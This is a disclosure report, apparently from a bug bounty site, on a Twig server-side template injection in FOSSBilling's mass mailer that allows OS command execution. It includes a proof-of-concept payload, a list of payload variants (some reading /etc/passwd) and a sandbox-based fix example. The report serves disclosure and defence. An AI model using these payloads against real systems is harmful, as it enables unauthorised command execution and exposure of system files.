Server-Side Template Injection leads to Remote Code Execution in fossbilling/fossbilling

Valid

Reported on

Jun 15th 2023


Description

An admin or staff account that holds the "Mass mailer" permission can perform a Server-Side Template Injection (SSTI) attack through the mass mailer's email content, which is rendered as a Twig template.

Proof of Concept

Log in as an admin or a staff user who has the "Mass mailer" permission and edit a message.

In the "Email content" field, insert the following value and click "Update and preview":

{% apply markdown %}
Greeting from {{ ['id']|filter('system') }}
Your email is: {{ c.email }}

Order our services at {{ "order"|link }}

{{ guest.system_company.name }}
{% endapply %}


The preview shows that the command "id" was executed on the server.

Impact

An authenticated admin or staff user can achieve full remote command execution at the OS level as the web server user.
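One defensive pattern for this class of bug, shown here as an added example and not as FOSSBilling's own fix (the referenced commit is not reproduced): render the user-supplied email body through a Twig sandbox whose policy allowlists filters, so callback-accepting filters such as filter, map, reduce and sort are rejected before any output is produced. The tag and filter names in the policy, and the variable names, are assumptions chosen for illustration.

```php
<?php
// Added example (not FOSSBilling's patch): sandbox user-editable Twig templates.
require __DIR__ . '/vendor/autoload.php'; // assumes twig/twig is installed via Composer

use Twig\Environment;
use Twig\Loader\ArrayLoader;
use Twig\Extension\SandboxExtension;
use Twig\Sandbox\SecurityPolicy;
use Twig\Sandbox\SecurityError;

// Allowlist only what an email template legitimately needs.
// Filters that take a PHP callable (filter, map, reduce, sort) are
// deliberately absent, so a template cannot reach system()/passthru().
$policy = new SecurityPolicy(
    ['if', 'for', 'apply'],                          // allowed tags (assumed set)
    ['escape', 'upper', 'lower', 'date', 'nl2br'],   // allowed filters; 'escape' keeps autoescaping working
    [],                                              // allowed methods
    [],                                              // allowed properties
    []                                               // allowed functions
);

$twig = new Environment(new ArrayLoader());
// Second argument true: every template is sandboxed, not only {% sandbox %} blocks.
$twig->addExtension(new SandboxExtension($policy, true));

/**
 * Render a template supplied by a (privileged but untrusted) user.
 * Returns null when the sandbox policy rejects it, so the caller can
 * refuse the message instead of sending a partially rendered one.
 */
function renderUserTemplate(Environment $twig, string $source, array $vars): ?string
{
    try {
        return $twig->createTemplate($source)->render($vars);
    } catch (SecurityError $e) {
        // The policy check runs before the body executes, so nothing was rendered.
        error_log('Rejected email template: ' . $e->getMessage());
        return null;
    }
}

// Constructed inputs: a benign template, then the payload from this report.
var_dump(renderUserTemplate($twig, 'Hello {{ name|upper }}', ['name' => 'alice']));
var_dump(renderUserTemplate($twig, "Greeting from {{ ['id']|filter('system') }}", []));
```

The first call renders "Hello ALICE"; the second is refused with a message that the "filter" filter is not allowed, and no command runs. Restricting which accounts hold the "Mass mailer" permission remains a separate, complementary control.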

Occurrences

We are processing your report and will contact the fossbilling team within 24 hours. 3 months ago
Belle Aerni modified the Severity from Critical (9.1) to High (8) 3 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Belle Aerni validated this vulnerability 3 months ago

Hello, Thanks for the report. I've been able to validate this on my end.

Generally I'd probably close this type of report as the primary issue appears to be on Twig's end, however from what I can tell it's been known for roughly 3 years so they don't seem to be interested in providing protection against this type of exploit, leaving the responsibility on us.

Just as a heads up, I did modify the attack complexity, as the scope of what could be done is dependent on the server affected and how its permissions are configured.

I have submitted a pull request against our repository to prevent this & I have validated that it prevents the following POC snippets I found online for this Twig exploit:

{{['id']|filter('system')}}
{{[0]|reduce('system','id')}}
{{['id']|map('system')|join}}
{{['id',1]|sort('system')|join}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}}
{{['id']|map('passthru')}}
hiu240900 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
hiu240900
3 months ago

Researcher


Hello, Thanks for the response.

Hopefully the patch will be released soon. Is it still possible to assign a CVE?

Belle Aerni
3 months ago

Maintainer


Hi there,

The patch still needs to be reviewed by other FOSSBilling contributors before it can be merged and released, however I expect the total time between now and a patched release to be about a week.

Once it's merged and we have a release made, a CVE will be assigned to this report. Thanks!

hiu240900
3 months ago

Researcher


Thanks for the information!

Belle Aerni marked this as fixed in 0.5.1 with commit 47343f 3 months ago
Belle Aerni has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jul 3rd 2023
index.html#L1 has been validated
Belle Aerni published this vulnerability 3 months ago